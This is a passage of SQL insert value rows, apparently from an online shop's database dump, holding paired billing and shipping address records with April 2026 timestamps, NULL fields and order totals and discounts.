(1881, 1124, '2026-04-22 15:09:20', '2026-04-22 15:09:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1882, 1124, '2026-04-22 15:09:20', '2026-04-22 15:09:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1883, 1125, '2026-04-22 15:09:25', '2026-04-22 15:09:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1884, 1125, '2026-04-22 15:09:25', '2026-04-22 15:09:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1885, 1126, '2026-04-22 15:09:29', '2026-04-22 15:09:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1886, 1126, '2026-04-22 15:09:29', '2026-04-22 15:09:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1887, 1127, '2026-04-22 15:10:36', '2026-04-22 15:10:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1888, 1127, '2026-04-22 15:10:36', '2026-04-22 15:10:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1889, 1128, '2026-04-22 15:11:52', '2026-04-22 15:11:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1890, 1128, '2026-04-22 15:11:52', '2026-04-22 15:11:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1891, 1129, '2026-04-22 15:12:04', '2026-04-22 15:12:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1892, 1129, '2026-04-22 15:12:04', '2026-04-22 15:12:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1893, 1130, '2026-04-22 15:12:05', '2026-04-22 15:12:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1894, 1130, '2026-04-22 15:12:05', '2026-04-22 15:12:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1895, 1131, '2026-04-22 17:12:21', '2026-04-22 17:12:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1896, 1131, '2026-04-22 17:12:21', '2026-04-22 17:12:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1897, 1132, '2026-04-22 17:47:18', '2026-04-22 17:47:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1898, 1132, '2026-04-22 17:47:18', '2026-04-22 17:47:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1899, 1133, '2026-04-23 01:05:56', '2026-04-23 01:05:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1900, 1133, '2026-04-23 01:05:56', '2026-04-23 01:05:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1901, 1134, '2026-04-23 02:40:22', '2026-04-23 02:40:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1902, 1134, '2026-04-23 02:40:22', '2026-04-23 02:40:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1903, 1135, '2026-04-23 08:12:05', '2026-04-23 08:12:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1904, 1135, '2026-04-23 08:12:05', '2026-04-23 08:12:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1905, 1136, '2026-04-23 12:02:28', '2026-04-23 12:02:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1906, 1136, '2026-04-23 12:02:28', '2026-04-23 12:02:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1907, 1137, '2026-04-23 16:41:36', '2026-04-23 16:41:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1908, 1137, '2026-04-23 16:41:36', '2026-04-23 16:41:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1909, 1138, '2026-04-23 17:38:46', '2026-04-23 17:38:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1910, 1138, '2026-04-23 17:38:46', '2026-04-23 17:38:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1911, 1139, '2026-04-23 21:31:11', '2026-04-23 21:31:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1912, 1139, '2026-04-23 21:31:11', '2026-04-23 21:31:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1913, 1140, '2026-04-24 01:00:31', '2026-04-24 01:00:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1914, 1140, '2026-04-24 01:00:31', '2026-04-24 01:00:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1915, 1141, '2026-04-24 06:44:30', '2026-04-24 06:44:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1916, 1141, '2026-04-24 06:44:30', '2026-04-24 06:44:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1917, 1142, '2026-04-24 09:15:50', '2026-04-24 09:15:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1918, 1142, '2026-04-24 09:15:50', '2026-04-24 09:15:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1919, 1143, '2026-04-24 16:15:29', '2026-04-24 16:15:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1920, 1143, '2026-04-24 16:15:29', '2026-04-24 16:15:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1921, 1144, '2026-04-24 18:33:36', '2026-04-24 18:33:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1922, 1144, '2026-04-24 18:33:36', '2026-04-24 18:33:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1923, 1145, '2026-04-24 23:08:22', '2026-04-24 23:08:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1924, 1145, '2026-04-24 23:08:22', '2026-04-24 23:08:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1925, 1146, '2026-04-24 23:08:27', '2026-04-24 23:08:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1926, 1146, '2026-04-24 23:08:27', '2026-04-24 23:08:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
